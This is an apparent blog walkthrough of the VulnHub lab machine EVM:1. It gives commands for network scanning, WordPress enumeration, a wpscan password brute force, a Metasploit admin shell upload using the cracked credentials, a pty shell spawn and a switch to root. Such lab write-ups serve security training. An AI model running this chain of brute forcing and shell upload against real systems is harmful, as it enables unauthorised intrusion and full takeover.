EVM : 1 Walkthrough (VulnHub) :-
Today we’ll be continuing with our new machine on VulnHub. In this article, we will see a walkthrough of an interesting VulnHub machine called EVM:1
Here is the link to downlaod this VM:-
Network Scanning
We always start with network scanning, Let’s find the target IP address by running netdiscover.
┌─[root@RDX]─[~]
└──╼ #netdiscover -i wlan0
As we saw in netdiscover result. Our target ip address is 192.168.48.255
Enumeration/Reconnaissance
Our next step is scanning the target machine. let’s start with nmap.
┌─[✗]─[root@RDX]─[~]
└──╼ #nmap -v -sT 192.168.48.225
With the help of nmap we are able to scan all open tcp ports
Starting with the port number 80 which is http .
open in browser http://192.168.48.225/
WEB PAGE SHOW - you can find me at /wordpress/ im vulnerable webapp :)
┌─[✗]─[root@RDX]─[/tmp]
└──╼ #dirb http://192.168.48.225
┌─[root@RDX]─[~]
└──╼ #wpscan — url http://192.168.48.225/wordpress/ -e at -e ap -e u
┌─[root@RDX]─[~]
└──╼ #wpscan — url http://192.168.48.225/wordpress -U c0rrupt3d_brain -P /root/rockyou.txt
Username: c0rrupt3d_brain
Password: 24992499
Exploit available in metasploit which allows you to get a shell.
exploit/unix/webapp/wp_admin_shell_upload
┌─[✗]─[root@RDX]─[~]
└──╼ #msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set rhosts 192.168.48.225
set targeturi /wordpress
set username c0rrupt3d_brain
set password 24992499
show options
exploit
cd /home
ls
cd root3r
ls
cat .root_password_ssh.txt
Privilege Escalation
shell
python -c ‘import pty;pty.spawn(“/bin/bash”)’
$ su root
willy26
# whoami
# cd
# ls
# cat proof.txt
Successfully got the root privilege and the ‘proof.txt’ .